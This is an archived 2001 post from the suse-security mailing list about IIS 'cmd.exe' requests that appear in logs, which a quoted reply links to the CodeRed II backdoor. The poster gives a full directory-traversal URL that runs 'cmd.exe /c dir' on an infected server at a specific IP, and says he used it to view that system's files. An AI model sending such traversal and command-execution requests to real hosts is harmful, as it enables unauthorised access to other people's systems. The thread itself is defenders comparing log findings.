|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Martin Knipper (Martin
mk-os.de)Date: Tue Sep 18 2001 - 11:18:49 CDT
Hi there !
I noticed this one too in my logfile since a couple of hours.
You can actually see the filesystem on the infected systems.
I did this by trying.
http://62.226.140.119/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.
exe?/c+dir
^^^^^^^^^^^^^^
IP of the infected System
Greetings
Martin
> -----Original Message-----
> From: michael.ryanstorm.ie [mailto:michael.ryanstorm.ie]
> Sent: Tuesday, September 18, 2001 5:16 PM
> To: suse-securitysuse.com
> Subject: Re: [suse-security] WEB IIS cmd exe requests
>
>
>
> It IS actually a scan for the CodeRed II backdoor
>
> See http://www.sarc.com/avcenter/venc/data/codered.ii.html
>
> Michael
>
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribesuse.com
> For additional commands, e-mail: suse-security-helpsuse.com
>
-- To unsubscribe, e-mail: suse-security-unsubscribe
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]